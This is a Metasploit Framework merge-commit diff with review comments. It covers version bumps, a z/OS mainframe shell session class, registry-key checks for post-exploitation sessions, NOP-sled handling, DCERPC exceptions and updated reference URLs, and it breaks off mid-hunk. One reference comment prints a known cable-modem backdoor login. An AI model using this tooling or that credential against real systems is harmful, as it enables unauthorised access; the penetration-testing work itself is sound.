Merge branch 'upstream-master' into land-6120-python-stageless
commit
be23da1c1f
18
Gemfile.lock
18
Gemfile.lock
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.11.4)
|
||||
metasploit-framework (4.11.5)
|
||||
actionpack (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
bcrypt
|
||||
|
@ -21,14 +21,14 @@ PATH
|
|||
rubyzip (~> 1.1)
|
||||
sqlite3
|
||||
tzinfo
|
||||
metasploit-framework-db (4.11.4)
|
||||
metasploit-framework-db (4.11.5)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
metasploit-credential (= 1.0.1)
|
||||
metasploit-framework (= 4.11.4)
|
||||
metasploit_data_models (= 1.2.7)
|
||||
metasploit-framework (= 4.11.5)
|
||||
metasploit_data_models (= 1.2.9)
|
||||
pg (>= 0.11)
|
||||
metasploit-framework-pcap (4.11.4)
|
||||
metasploit-framework (= 4.11.4)
|
||||
metasploit-framework-pcap (4.11.5)
|
||||
metasploit-framework (= 4.11.5)
|
||||
network_interface (~> 0.0.1)
|
||||
pcaprub
|
||||
|
||||
|
@ -126,7 +126,7 @@ GEM
|
|||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
metasploit-payloads (1.0.15)
|
||||
metasploit_data_models (1.2.7)
|
||||
metasploit_data_models (1.2.9)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
arel-helpers
|
||||
|
@ -140,7 +140,7 @@ GEM
|
|||
mime-types (2.6.1)
|
||||
mini_portile (0.6.2)
|
||||
minitest (4.7.5)
|
||||
msgpack (0.6.2)
|
||||
msgpack (0.7.0)
|
||||
multi_json (1.11.2)
|
||||
multi_test (0.1.2)
|
||||
network_interface (0.0.1)
|
||||
|
@ -221,7 +221,7 @@ GEM
|
|||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
sprockets (>= 2.8, < 4.0)
|
||||
sqlite3 (1.3.10)
|
||||
sqlite3 (1.3.11)
|
||||
thor (0.19.1)
|
||||
thread_safe (0.3.5)
|
||||
tilt (1.4.1)
|
||||
|
|
|
@ -32,7 +32,7 @@ module Metasploit
|
|||
|
||||
MAJOR = 4
|
||||
MINOR = 11
|
||||
PATCH = 4
|
||||
PATCH = 5
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
end
|
||||
|
|
|
@ -638,13 +638,10 @@ class ReadableText
|
|||
# @param col [Integer] the column wrap width.
|
||||
# @return [String] the formatted list of running jobs.
|
||||
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||
columns = [ 'Id', 'Name' ]
|
||||
columns = [ 'Id', 'Name', "Payload", "LPORT" ]
|
||||
|
||||
if (verbose)
|
||||
columns << "Payload"
|
||||
columns << "LPORT"
|
||||
columns << "URIPATH"
|
||||
columns << "Start Time"
|
||||
columns += [ "URIPATH", "Start Time" ]
|
||||
end
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
|
@ -653,16 +650,19 @@ class ReadableText
|
|||
'Columns' => columns
|
||||
)
|
||||
|
||||
|
||||
# jobs are stored as a hash with the keys being a numeric job_id.
|
||||
framework.jobs.keys.sort{|a,b| a.to_i <=> b.to_i }.each { |k|
|
||||
# Job context is stored as an Array with the 0th element being
|
||||
# the running module. If that module is an exploit, ctx will also
|
||||
# contain its payload.
|
||||
ctx = framework.jobs[k].ctx
|
||||
row = [ k, framework.jobs[k].name ]
|
||||
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
|
||||
row << (ctx[0].datastore['LPORT'] || "")
|
||||
|
||||
if (verbose)
|
||||
ctx = framework.jobs[k].ctx
|
||||
uripath = ctx[0].get_resource if ctx[0].respond_to?(:get_resource)
|
||||
uripath = ctx[0].datastore['URIPATH'] if uripath.nil?
|
||||
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
|
||||
row << (ctx[0].datastore['LPORT'] || "")
|
||||
row << (uripath || "")
|
||||
row << (framework.jobs[k].start_time || "")
|
||||
end
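Review bot: The new columns literal mixes quote styles, `columns = [ 'Id', 'Name', "Payload", "LPORT" ]`, and the verbose extension then uses double quotes again; `columns = [ 'Id', 'Name', 'Payload', 'LPORT' ]` together with `columns += [ 'URIPATH', 'Start Time' ]` keeps one style within the method. The `ctx[0].datastore[...]`/`ctx[1].refname` lookups that used to run only under `verbose` now run for every job in the listing, so any job whose ctx lacks a module object (if such jobs can be registered) would now break the plain `jobs` output as well as the verbose one; a guard such as `next unless ctx && ctx[0]` before `row = [ ... ]` is worth confirming against how jobs get their ctx. The comment block added above the loop is a good fit for the file's YARD style. dump_jobs continues past the last line of the hunk.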
|
||||
|
|
|
@ -0,0 +1,149 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/command_shell'
|
||||
|
||||
module Msf::Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides basic interaction with a Unix Systems Service
|
||||
# command shell on a mainframe (IBM System Z) running Z/OS
|
||||
# This session is initialized with a stream that will be used
|
||||
# as the pipe for reading and writing the command shell.
|
||||
#
|
||||
# Date: Oct 8, 2015
|
||||
# Author: Bigendian Smalls
|
||||
#
|
||||
###
|
||||
class MainframeShell < Msf::Sessions::CommandShell
|
||||
|
||||
#
|
||||
# This interface supports basic interaction.
|
||||
#
|
||||
include Msf::Session::Basic
|
||||
|
||||
#
|
||||
# This interface supports interacting with a single command shell.
|
||||
#
|
||||
include Msf::Session::Provider::SingleCommandShell
|
||||
|
||||
##
|
||||
#
|
||||
# initialize as mf shell session
|
||||
#
|
||||
def initialize(*args)
|
||||
self.platform = "mainframe"
|
||||
self.arch = "zarch"
|
||||
self.translate_1047 = true
|
||||
super
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Returns the session description.
|
||||
#
|
||||
def desc
|
||||
"Mainframe shell"
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# override shell_read to include decode of cp1047
|
||||
#
|
||||
def shell_read(length=-1, timeout=1)
|
||||
#mfimpl
|
||||
if self.respond_to?(:ring)
|
||||
return Rex::Text.from_ibm1047(shell_read_ring(length,timeout))
|
||||
end
|
||||
|
||||
begin
|
||||
rv = Rex::Text.from_ibm1047(rstream.get_once(length, timeout))
|
||||
framework.events.on_session_output(self, rv) if rv
|
||||
return rv
|
||||
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
|
||||
shell_close
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# override shell_write to include encode of cp1047
|
||||
#
|
||||
def shell_write(buf)
|
||||
#mfimpl
|
||||
return unless buf
|
||||
|
||||
begin
|
||||
framework.events.on_session_command(self, buf.strip)
|
||||
rstream.write(Rex::Text.to_ibm1047(buf))
|
||||
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
|
||||
shell_close
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
def execute_file(full_path, args)
|
||||
#mfimpl
|
||||
raise NotImplementedError
|
||||
end
|
||||
|
||||
# need to do more testing on this before we either use the default in command_shell
|
||||
# or write a new one. For now we just make it unavailble. This prevents a hang on
|
||||
# initial session creation. See PR#6067
|
||||
undef_method :process_autoruns
|
||||
|
||||
def desc
|
||||
"Mainframe USS session"
|
||||
end
|
||||
|
||||
attr_accessor :translate_1047 # tells the session whether or not to translate
|
||||
# ebcdic (cp1047) <-> ASCII for certain mainframe payloads
|
||||
# this will be used in post modules to be able to switch on/off the
|
||||
# translation on file transfers, for instance
|
||||
|
||||
protected
|
||||
|
||||
##
|
||||
#
|
||||
# _interact_ring overridden to include decoding of cp1047 data
|
||||
#
|
||||
def _interact_ring
|
||||
begin
|
||||
rdr = framework.threads.spawn("RingMonitor", false) do
|
||||
seq = nil
|
||||
|
||||
while self.interacting
|
||||
# Look for any pending data from the remote ring
|
||||
nseq,data = ring.read_data(seq)
|
||||
|
||||
# Update the sequence number if necessary
|
||||
seq = nseq || seq
|
||||
|
||||
# Write output to the local stream if successful
|
||||
user_output.print(Rex::Text.from_ibm1047(data)) if data
|
||||
|
||||
begin
|
||||
# Wait for new data to arrive on this session
|
||||
ring.wait(seq)
|
||||
rescue EOFError => e
|
||||
print_error("EOFError: #{e.class}: #{e}")
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
while self.interacting
|
||||
# Look for any pending input or errors from the local stream
|
||||
sd = Rex::ThreadSafe.select([ _local_fd ], nil, [_local_fd], 5.0)
|
||||
|
||||
# Write input to the ring's input mechanism
|
||||
shell_write(user_input.gets) if sd
|
||||
end
|
||||
ensure
|
||||
rdr.kill
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
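Review bot: `desc` is defined twice in MainframeShell, first returning "Mainframe shell" and later "Mainframe USS session"; the second definition silently replaces the first and Ruby warns about the redefinition under -w, so one of the two should be removed. `translate_1047` is set to true in `initialize` and documented as the switch for EBCDIC (CP1047) translation, yet `shell_read`, `shell_write` and `_interact_ring` call `Rex::Text.from_ibm1047`/`to_ibm1047` unconditionally, so the accessor has no effect on this class's own I/O; either consult it (`data = translate_1047 ? Rex::Text.from_ibm1047(raw) : raw`) or state in the comment that it is only read by post modules. In `_interact_ring` the `ensure` clause runs `rdr.kill` even when `framework.threads.spawn` raised before `rdr` was assigned, which would turn that failure into a NoMethodError; `rdr.kill if rdr` avoids it. If `rstream.get_once` can return nil on timeout, `Rex::Text.from_ibm1047(nil)` in `shell_read` runs before the `if rv` guard, so reading into a local first (`raw = rstream.get_once(length, timeout)` then `rv = raw && Rex::Text.from_ibm1047(raw)`) keeps that guard meaningful.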
|
|
@ -342,14 +342,18 @@ class EncodedPayload
|
|||
self.nop_sled = nop.generate_sled(self.nop_sled_size,
|
||||
'BadChars' => reqs['BadChars'],
|
||||
'SaveRegisters' => save_regs)
|
||||
|
||||
if nop_sled && nop_sled.length == nop_sled_size
|
||||
break
|
||||
else
|
||||
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload", 'core', LEV_1)
|
||||
end
|
||||
rescue
|
||||
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload: #{$!}",
|
||||
'core', LEV_1)
|
||||
|
||||
self.nop = nil
|
||||
end
|
||||
|
||||
break
|
||||
}
|
||||
|
||||
if (self.nop_sled == nil)
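Review bot: The two failure branches leave `self.nop` in different states: when `generate_sled` returns a sled of the wrong length the `else` branch only logs and `self.nop` still points at the generator that failed, whereas the `rescue` branch clears it with `self.nop = nil`; since the code after the loop inspects `self.nop_sled` (context line at the bottom), the `else` branch should most likely clear `self.nop` too so both failures look the same to the caller. The bare `rescue` with `#{$!}` in the message is the older idiom; `rescue => e` and `#{e}` is clearer and avoids the global, and the same pattern appears in the Exploit hunk that follows (`@ -1034`, `wlog ... #{$!}`). The enclosing iteration over nop generators starts before the hunk, so whether the trailing `break` after the `begin`/`rescue` is new or carried over from the old side is not visible here; if it is on the new side, the loop exits after the first generator regardless of the outcome.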
|
||||
|
|
|
@ -1034,12 +1034,16 @@ class Exploit < Msf::Module
|
|||
nop_sled = nop.generate_sled(count,
|
||||
'BadChars' => payload_badchars || '',
|
||||
'SaveRegisters' => save_regs)
|
||||
|
||||
if nop_sled && nop_sled.length == count
|
||||
break
|
||||
else
|
||||
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit", 'core', LEV_0)
|
||||
end
|
||||
rescue
|
||||
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit: #{$!}",
|
||||
'core', LEV_0)
|
||||
end
|
||||
|
||||
break
|
||||
}
|
||||
|
||||
nop_sled
|
||||
|
|
|
@ -145,6 +145,19 @@ module Registry
|
|||
end
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry
|
||||
#
|
||||
# @param key [String] the full path of the key to check
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise
|
||||
# (also in case of error)
|
||||
def registry_key_exist?(key)
|
||||
if session_has_registry_ext
|
||||
meterpreter_registry_key_exist?(key)
|
||||
else
|
||||
shell_registry_key_exist?(key)
|
||||
end
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
|
@ -310,6 +323,26 @@ protected
|
|||
shell_registry_cmd_result("add /f \"#{key}\" /v \"#{valname}\" /t \"#{type}\" /d \"#{data}\" /f", view)
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry using a shell session
|
||||
#
|
||||
# @param key [String] the full path of the key to check
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise,
|
||||
# even if case of error (invalid arguments) or the session hasn't permission to
|
||||
# access the key
|
||||
def shell_registry_key_exist?(key)
|
||||
begin
|
||||
key = normalize_key(key)
|
||||
rescue ArgumentError
|
||||
return false
|
||||
end
|
||||
|
||||
results = shell_registry_cmd("query \"#{key}\"")
|
||||
if results =~ /ERROR: /i
|
||||
return false
|
||||
else
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
||||
##
|
||||
# Meterpreter-specific registry manipulation methods
|
||||
|
@ -515,6 +548,27 @@ protected
|
|||
end
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry using a meterpreter session
|
||||
#
|
||||
# @param key [String] the full path of the key to check
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise
|
||||
# (also in case of error)
|
||||
def meterpreter_registry_key_exist?(key)
|
||||
begin
|
||||
root_key, base_key = session.sys.registry.splitkey(key)
|
||||
rescue ArgumentError
|
||||
return false
|
||||
end
|
||||
|
||||
begin
|
||||
check = session.sys.registry.check_key_exists(root_key, base_key)
|
||||
rescue Rex::Post::Meterpreter::RequestError, TimesoutError
|
||||
return false
|
||||
end
|
||||
|
||||
check
|
||||
end
|
||||
|
||||
#
|
||||
# Normalize the supplied full registry key string so the root key is sane. For
|
||||
# instance, passing "HKLM\Software\Dog" will return 'HKEY_LOCAL_MACHINE\Software\Dog'
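Review bot: `meterpreter_registry_key_exist?` rescues `TimesoutError`, which does not look like a constant defined anywhere (the method it wraps documents `TimeoutError`); Ruby resolves a rescue clause's class list only when an exception propagates, so a real timeout would surface as a NameError from the rescue line instead of the documented `false`, and the clause should read `rescue Rex::Post::Meterpreter::RequestError, TimeoutError`. In `shell_registry_key_exist?`, `results =~ /ERROR: /i` is nil when `shell_registry_cmd` returns nil (no output at all), and the method then reports the key as existing; `return false if results.nil? || results =~ /ERROR: /i` followed by `true` keeps "can't tell" on the false side, as the docstring promises. That check also relies on the English `ERROR:` prefix of reg.exe output, which a localized target may not produce, so a comment noting the assumption would help. The docstring on the shell helper reads "even if case of error"; "even in case of error" is meant.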
|
||||
|
|
|
@ -481,15 +481,17 @@ private
|
|||
def _valid_session(sid,type)
|
||||
|
||||
s = self.framework.sessions[sid.to_i]
|
||||
|
||||
if(not s)
|
||||
error(500, "Unknown Session ID")
|
||||
error(500, "Unknown Session ID #{sid}")
|
||||
end
|
||||
|
||||
if type == "ring"
|
||||
if not s.respond_to?(:ring)
|
||||
error(500, "Session #{s.type} does not support ring operations")
|
||||
end
|
||||
elsif (s.type != type)
|
||||
elsif (type == 'meterpreter' && s.type != type) ||
|
||||
(type == 'shell' && s.type == 'meterpreter')
|
||||
error(500, "Session is not of type " + type)
|
||||
end
|
||||
s
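Review bot: The new `elsif` only rejects mismatches for `'meterpreter'` and `'shell'`: a caller passing any other `type` string now gets the session back with no check at all, whereas the replaced `s.type != type` comparison rejected every mismatch. If the intent is that `'shell'` should also accept non-meterpreter session kinds, as the second condition suggests, an additional branch such as `elsif !['meterpreter', 'shell'].include?(type)` raising `error(500, "Unknown session type " + type)` keeps unrecognised type values from slipping through; the callers are not visible here. The multi-line `elsif` condition would read more easily with each `(type == ..., s.type ...)` clause on its own line with a leading `||`, matching the file's parenthesised style.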
|
||||
|
|
|
@ -77,6 +77,22 @@ class Registry
|
|||
client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry
|
||||
#
|
||||
# @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
|
||||
# @param base_key [String] the base part of the key path
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise, even
|
||||
# it the session hasn't permissions to access the target key.
|
||||
# @raise [TimeoutError] if the timeout expires when waiting the answer
|
||||
# @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
|
||||
def Registry.check_key_exists(root_key, base_key)
|
||||
request = Packet.create_request('stdapi_registry_check_key_exists')
|
||||
request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
|
||||
request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
|
||||
response = client.send_request(request)
|
||||
return response.get_tlv(TLV_TYPE_BOOL).value
|
||||
end
|
||||
|
||||
#
|
||||
# Opens the supplied registry key on the specified remote host. Requires that the
|
||||
# current process has credentials to access the target and that the target has the
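Review bot: `check_key_exists` dereferences `response.get_tlv(TLV_TYPE_BOOL)` without a nil check, so a reply that lacks that TLV (a malformed or unexpected response, which the surrounding code presumably treats as an error elsewhere) raises NoMethodError rather than either of the documented exceptions; reading it into a local first, `tlv = response.get_tlv(TLV_TYPE_BOOL)`, and then deciding explicitly what a missing TLV means (return false, or raise the file's request error) would make the failure mode deliberate. The explicit `return` on the last line is not needed in Ruby. The doc line "even it the session hasn't permissions to access the target key" should read "even if the session has no permission to access the target key".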
|
||||
|
|
|
@ -57,7 +57,7 @@ require 'rex/proto/smb/exceptions'
|
|||
case self.handle.protocol
|
||||
when 'ncacn_ip_tcp'
|
||||
if self.socket.type? != 'tcp'
|
||||
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
end
|
||||
when 'ncacn_np'
|
||||
if self.socket.class == Rex::Proto::SMB::SimpleClient::OpenPipe
|
||||
|
@ -65,11 +65,11 @@ require 'rex/proto/smb/exceptions'
|
|||
elsif self.socket.type? == 'tcp'
|
||||
self.smb_connect()
|
||||
else
|
||||
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
end
|
||||
# No support ncacn_ip_udp (is it needed now that its ripped from Vista?)
|
||||
else
|
||||
raise "Unsupported protocol : #{self.handle.protocol}"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "Unsupported protocol : #{self.handle.protocol}"
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -255,7 +255,7 @@ require 'rex/proto/smb/exceptions'
|
|||
bind, context = Rex::Proto::DCERPC::Packet.make_bind(*self.handle.uuid)
|
||||
end
|
||||
|
||||
raise 'make_bind failed' if !bind
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::BindError, 'make_bind failed' if !bind
|
||||
|
||||
self.write(bind)
|
||||
raw_response = self.read()
|
||||
|
@ -264,11 +264,11 @@ require 'rex/proto/smb/exceptions'
|
|||
self.last_response = response
|
||||
if response.type == 12 or response.type == 15
|
||||
if self.last_response.ack_result[context] == 2
|
||||
raise "Could not bind to #{self.handle}"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
|
||||
end
|
||||
self.context = context
|
||||
else
|
||||
raise "Could not bind to #{self.handle}"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
|
||||
end
|
||||
end
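Review bot: `InvalidSocket` is now raised for the unsupported-protocol case (`raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "Unsupported protocol : ..."`) as well as for the two socket-type mismatches; the protocol branch is a handle problem rather than a socket problem, so a caller that rescues InvalidSocket to retry with another socket would be misled, and either a distinct exception class or a comment on that line such as `# handle protocol not supported; reported as InvalidSocket for lack of a better class` is warranted. `raise ... if !bind` on the make_bind line is `raise ... unless bind` in idiomatic form. The identical `"ack, #{self.handle.protocol} requires socket type tcp, ..."` message is built twice (`@ -57` and `@ -65`); a small private helper would keep the two from drifting. Each of the four hunks sits inside a method that starts before it.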
|
||||
|
||||
|
|
|
@ -132,6 +132,32 @@ class NoResponse < Error
|
|||
end
|
||||
end
|
||||
|
||||
class BindError < Error
|
||||
def initialize(message=nil)
|
||||
@message = message
|
||||
end
|
||||
|
||||
def to_s
|
||||
str = 'Failed to bind.'
|
||||
if @message
|
||||
str += " #{@message}"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
class InvalidSocket < Error
|
||||
def initialize(message=nil)
|
||||
@message = message
|
||||
end
|
||||
|
||||
def to_s
|
||||
str = 'Invalid Socket.'
|
||||
if @message
|
||||
str += " #{@message}"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
class InvalidPacket < Error
|
||||
def initialize(message = nil)
|
||||
@message = message
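Review bot: `BindError#to_s` and `InvalidSocket#to_s` return nil when no message was given: the method's value is that of the trailing `if`, which is nil when `@message` is unset, so `raise BindError` with no argument produces an exception whose `to_s`/`message` is not a String and interpolates as `#<...>`. Add `str` as the last line of each `to_s` (after the `end` of the `if`), or write the body as `['Failed to bind.', @message].compact.join(' ')` and `['Invalid Socket.', @message].compact.join(' ')`. `str += " #{@message}"` allocates a new string each time; `str << " #{@message}"` is the usual form, though either is fine at this size. The `InvalidPacket` class at the bottom continues outside the hunk.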
|
||||
|
|
|
@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
|
|||
# Metasploit::Credential database models
|
||||
spec.add_runtime_dependency 'metasploit-credential', '1.0.1'
|
||||
# Database models shared between framework and Pro.
|
||||
spec.add_runtime_dependency 'metasploit_data_models', '1.2.7'
|
||||
spec.add_runtime_dependency 'metasploit_data_models', '1.2.9'
|
||||
# depend on metasploit-framewrok as the optional gems are useless with the actual code
|
||||
spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
|
|
|
@ -28,9 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '19680' ],
|
||||
[ 'CVE', '2006-4313' ],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
|
||||
[ 'OSVDB', '28139' ],
|
||||
[ 'OSVDB', '28138' ],
|
||||
[ 'OSVDB', '28138' ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 23 2006'))
|
||||
|
||||
|
|
|
@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2011-0923' ],
|
||||
[ 'OSVDB', '72526' ],
|
||||
[ 'ZDI', '11-055' ],
|
||||
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html' ],
|
||||
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
|
||||
],
|
||||
'Author' =>
|
||||
|
|
|
@ -46,8 +46,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' => [
|
||||
[ 'CVE', '2015-0964' ], # XSS vulnerability
|
||||
[ 'CVE', '2015-0965' ], # CSRF vulnerability
|
||||
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
|
||||
[ 'URL', 'https://community.rapid7.com/rapid7_blogpostdetail?id=a111400000AanBs' ] # Original disclosure
|
||||
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
|
||||
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems' ],
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'EDB', '25252' ],
|
||||
[ 'OSVDB', '93013' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ],
|
||||
[ 'URL', 'http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ]
|
||||
],
|
||||
'Author' => [
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>'
|
||||
|
|
|
@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '89912' ],
|
||||
[ 'BID', '57760' ],
|
||||
[ 'EDB', '24475' ],
|
||||
[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 05 2013'))
|
||||
|
|
|
@ -29,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
|
||||
[ 'EDB', '24202' ],
|
||||
|
|
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2014-7862'],
|
||||
['OSVDB', '116554'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 31 2014'))
|
||||
|
||||
|
|
|
@ -36,8 +36,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2014-7863'],
|
||||
['OSVDB', '117696'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jan 28 2015'))
|
||||
|
||||
|
|
|
@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2014-7863'],
|
||||
['OSVDB', '117695'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jan 28 2015'))
|
||||
|
||||
|
|
|
@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2014-8499' ],
|
||||
[ 'OSVDB', '114485' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ]
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ],
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt' ],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 8 2014'))
|
||||
|
||||
|
|
|
@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2014-5445' ],
|
||||
[ 'OSVDB', '115340' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ]
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ],
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 30 2014'))
|
||||
|
||||
|
|
|
@ -29,9 +29,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ],
|
||||
# Fill this in with the direct advisory URL from Infigo
|
||||
[ 'URL', 'http://www.infigo.hr/in_focus/advisories/' ]
|
||||
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'SSL' => true
|
||||
|
|
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-2993' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
|
||||
